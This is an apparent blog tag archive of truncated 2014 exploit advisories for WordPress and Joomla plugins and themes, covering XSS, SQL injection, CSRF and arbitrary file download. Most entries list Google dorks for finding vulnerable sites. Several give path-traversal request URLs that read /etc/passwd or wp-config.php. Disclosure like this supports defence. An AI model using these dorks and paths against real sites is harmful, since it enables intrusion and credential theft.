Tags archives: security

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

WP Photo Album Plus Security Vulnerabilities
Author: Milhouse
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus

Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11

Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details: The plugin echoes the value of the [...]

Joomla Spider Form Maker 4.3 SQL Injection

######################
# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://web-dorado.com/products/joomla-form.html
# Dork Google: inurl:com_formmaker
# Date : 2014-09-07
# Tested on : Windows 7 / Mozilla Firefox
# Linux [...]

WordPress Plugin Vulnerability Dump – Part 2

More vulnerabilities in poorly coded plugins for y’all.

Ninja Forms v2.77 – Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 – Email header injection
WP to Twitter v2.9.3 – Authorization bypass (regular users can tweet to the admin’s twitter account)
Xhanch – My Twitter v2.7.7 – CSRF (create and delete tweets)
[...]

WordPress Spider Facebook 1.0.8 SQL Injection

######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap [...]

WordPress Like Dislike Counter 1.2.3 SQL Injection

#################################################################################################
#
# Title : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability
# Risk : High+/Critical
# Exploit Author : XroGuE
# Google Dork : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version : 1.2.3
# Plugin Name : Like Dislike Counter
# Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home : www.wpfruits.com
# Date : [...]

WordPress Bulk Delete Users By Email 1.0 CSRF

# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 – CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil – fikri.fadzil@impact-alliance.org
# Vendor Homepage – http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP

Description: This plugin will allow administrator to delete user(s) account [...]

WordPress Urban City Arbitrary File Download

[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/urbancity
[*] Date: 2014-09-07
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage: https://churchthemes.net/themes/urban-city/
[*] Tested on: Windows 7
[*] Location: [localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
[*] Proof: [...]

WordPress Epic Arbitrary File Download

[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/epic
[*] Date: 2014-09-07
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage: http://www.organizedthemes.com/epic
[*] Tested on: Windows 7
[*] Location: [localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd
[*] Proof: [...]

WordPress Authentic Arbitrary File Download

[*] Exploit Title: Wordpress Authentic Theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/authentic
[*] Date: 2014-09-07
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage: http://www.organizedthemes.com/authentic-theme
[*] Tested on: Windows 7
[*] Location: [localhost]/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
[*] Proof: [...]

WordPress Antioch Arbitrary File Download

[*] Exploit Title: Wordpress Antioch Theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/antioch
[*] Date: 2014-09-07
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage: http://churchthemes.net/themes/antioch
[*] Tested on: Windows 7
[*] Location: [localhost]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
[*] Proof: [...]